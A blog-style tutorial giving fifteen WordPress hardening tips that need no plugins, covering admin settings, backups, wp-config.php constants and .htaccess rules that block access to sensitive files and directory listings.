15 Tips for WordPress Security Without Plugins

wp-security-tips

How to increase WordPress security is probably the most widely discussed topic in different WordPress-related forums. You can choose from many great security plugins for sure, however there are also a handful of great tips that don’t require any third-party tools but can remarkably increase security on your WordPress site.

Some of these best practices can be easily performed from the WordPress admin, while others can be completed from the cPanel of your hosting account or by editing two configuration files: wp-config.php(for WP config) and .htaccess (for server config). You can access these config files in the public_htmlfolder of your WordPress install.

In this article, I’ll show you 15 WordPress security tips that don’t require the installation of a plugin.

1. Perform Regular Updates

Where: WordPress admin

The WordPress Core team regularly monitors security issues and whenever there’s a new vulnerability, they patch it. Bug fixes and security patches are available as updates from the Dashboard > Updatesmenu in the WordPress admin.

Always pay attention to regularly update your site. Not just the WordPress Core, but also update your plugins and themes, as plugin and theme authors also tend to release security updates when it’s necessary.

WordPress Security - Regular updates

2. Use the Principle of Least Privilege

Where: WordPress admin

Site owners giving too high privileges to users is a common WordPress security issue. According to the Principle of Least Privilege (PoLP), users should only have as many permissions as it’s necessary to properly do their job on the site. WordPress has an excellent user management system with five distinct user roles:

  1. Subscriber
  2. Contributor
  3. Author
  4. Editor
  5. Administrator

Only grant admin privileges to users who really perform admin tasks such as updating plugins, modifying settings, or installing themes. When you add a new user, you can easily select their user role from a dropdown list. Plus, it’s also easy to change user roles of existing users on the Users admin page.

To make your site more secure, scrutinize the “Roles and Capabilities” table in the WordPress Codex and decide what permissions each of your users needs. If they have too high privileges consider changing their role. Not just because they may abuse their permissions, but if their accounts get hacked hackers will be able to cause less harm to your site.

WordPress Security - Least Privilege Principle

3. Change the Default admin Username

Where: WordPress admin

The default admin username can cause serious problems to WordPress security. Automated brute force attacks frequently target admin user accounts in bulk. These are low-quality attacks that aren’t directed against a particular site, but rather try to find the ones that didn’t change the default admin username.

Changing the admin username is not that easy though, as WordPress doesn’t allow users to change their usernames from the admin area. You can change the username in the database for sure, however the easiest solution is to create a new admin user with a new username. Then, you just need to log in with the new admin and delete the old one.

WordPress Security - Change Default Admin Username

4. Use Strong Passwords for High-Level Users

Where: WordPress admin

Using strong passwords for high-level users is crucial to good WordPress security. When a new user registers, WordPress generate strong passwords by default, however users can change it to a weaker one. Pay attention that your high-level users (admins and editors) always use strong passwords. If they are afraid they won’t remember complicated passwords recommend them using a password manager application.

WordPress Security - Generate Strong Passwords

5. Regularly Export Your Content

Where: WordPress admin

If you have a successful WordPress blog your content is your most important asset. During certain types of attacks, your posts, pages, images, and other content types may be compromised. So, never forget to save them to your local machine or into a cloud storage.

You can easily export all your content from the Tools > Export menu in the WordPress admin. By hitting the “Download Export File” button, WordPress creates an XML file you can download. Whenever it’s necessary, you can easily reproduce your content by uploading the same XML file on the Tools > Importadmin page.

WordPress Security - Export Content

6. Remove Plugins and Themes You Don’t Need

Where: WordPress admin

Site owners tend to overuse plugins and don’t delete themes they don’t use, which sometimes can seriously compromise WordPress security. More plugins and themes mean more vulnerability. Each new plugin or theme increases the risk of being hacked.

Therefore, only use plugins that are completely necessary. Don’t only deactivate but also delete the ones you don’t need. And, as you can use only one theme on a WordPress site, it doesn’t make much sense to leave installed themes you don’t use. For better WordPress security, consider deleting the inactive ones. If you need them in the future you can quickly reinstall them.

WordPress Security - Remove Unused Plugins

7. Regularly Back Up Your Database

Where: cPanel

Besides exporting your content via the WordPress admin, it can also be helpful to create database backups. You can back up your database via the cPanel of your hosting account. Choose the File > Backups menu in your cPanel and download your SQL backup file. If anything goes wrong you can quickly restore your full database using the backup file.

Some hosting plans include an automated database backup option as well. If you want to secure your database consider choosing a hosting plan in which your hosting provider takes care of the backup.

WordPress Security - Back Up Your Database

8. Change Your Database Table Prefix

Where: wp-config.php

By default, WordPress uses the wp_ prefix for database tables. To make your site more secure, you can use a more complicated table prefix by changing the value of the $table_prefix variable in your wp-config file. Keep in mind that you can use only numbers, letters, and underscores in the table prefix. Any other characters, for instance special characters, will result in an invalid table prefix.

WordPress Security - Change Table Prefix

9. Force Secure Login

Where: wp-config.php

Forcing users to log in to the admin area via the secure SSL protocol can greatly increase WordPress security. However, you can only do that if you have an SSL certificate installed on your site. You can buy an SSL certificate at your hosting provider, however these days many hosting plans come with the free Let’s Encrypt certificate.

With the SSL certificate, you can use the secure HTTPS protocol for either the admin area or the whole site. You can force users to log in via the secure https:// link by adding the following line to the top of your wp-config file:

1
define( 'FORCE_SSL_ADMIN', true );

WordPress Security - Force SSL Login

10. Disable Plugin and Theme Modifications

Where: wp-config.php

By default, admin users can edit plugin and theme files from the WordPress admin. In a perfect world, this would be a great feature, however if a malicious attacker gets access to their accounts it can turn dangerous as well.

You can disable the plugin and theme editors for administrators by adding the following line to your wp-config file:

1
define( 'DISALLOW_FILE_EDIT', true );

If you don’t only want to disable the plugin and theme editors but also want to prevent administrators from updating plugins and themes from the WordPress admin use the following rule:

1
define( 'DISALLOW_FILE_MODS', true );

Don’t use both constants at the same time. If you want to update plugins and themes as a WordPress admin use DISALLOW_FILE_EDIT. If you don’t mind performing the updates from the background (via SFTP) use DISALLOW_FILE_MODS instead.

WordPress Security - Disable File Modifications

11. Disallow Unfiltered HTML

Where: wp-config.php

WordPress allows admins and editors to post HTML markup and JavaScript code (inside a <script> tag) from pages, posts, widgets, and comments. However, this can be dangerous if their account gets compromised. You can filter the HTML they post by adding the following rule to your wp-config file:

1
define( 'DISALLOW_UNFILTERED_HTML', true );

This way the HTML and JavaScript they post won’t be executed. Instead, it will appear on the website as a plain text string.

WordPress Security - Disallow Unfiltered HTML

12. Deny Access to Your wp-config File

Where: .htaccess

By default, anyone can get access to your wp-config file which contains all your configurations such as the database name, username, password, salt, and other highly sensitive data. You can deny access to the wp-config file by adding the following code snippet to your .htaccess file:

1
2
3
4
<Files wp-config.php>
Order Allow,Deny
Deny from all
</Files>

Place the above snippet below the Rewrite rules in the default WordPress .htaccess file, but above the closing </IfModule> tag.

WordPress Security - Protect wp-config

13. Deny Access to All Your .htaccess Files

Where: .htaccess

It’s also possible to deny unauthorized access to all the .htaccess files in your WordPress install. Your .htaccess files contain your Apache server configuration, however they are publicly available in the browser.

If you type http://yoursite.com/.htaccess into your browser’s URL bar you can check if your main .htaccess file can be accessed by anyone on the internet. Use the following .htaccess rule to protect you .htaccess files:

1
2
3
4
5
<Files ~ "^.*\.([Hh][Tt][Aa])">
Order Allow,Deny
Deny from all
Satisfy all
</Files>

WordPress Security - Protect .htaccess files

14. Disable Access to XML-RPC

Where: .htaccess

WordPress uses the XML-RPC protocol that can be used either for remote publishing or by third-party apps to connect to your site. However, it’s also a security vulnerability, as attackers may exploit the feature. If you don’t use any third-party apps consider disabling XML-RPC by adding the following snippet to your .htaccess file:

1
2
3
4
<FilesMatch "^(xmlrpc\.php)">
Order Deny,Allow
Deny from all
</FilesMatch>

Note that some popular WordPress plugins such as Jetpack also use the XML-RPC API. If you want to use Jetpack don’t disable access to XML-RPC.WordPress Security - Disable Access to XMLRPC

15. Disable Directory Browsing

Where: .htaccess

Although many WordPress users don’t know it, some of the WordPress directories can be listed in the browser in the following way:

WordPress Security - Directory Listing

Public access to your directory tree can be extremely harmful to WordPress security, as anyone can obtain a lot of sensitive information about your install. You can disable the feature by adding the following line to your .htaccess file:

1
Options -Indexes

WordPress Security - Prevent Directory Browsing Code

Learn More about WordPress Security

Putting security best practices into use is a crucial part of WordPress site management, however there are many other security-related tasks you may want to do. To learn more about WordPress security, check out our articles on the best two factor authentication and backup plugins, or read our guide on how to identify WordPress vulnerabilities.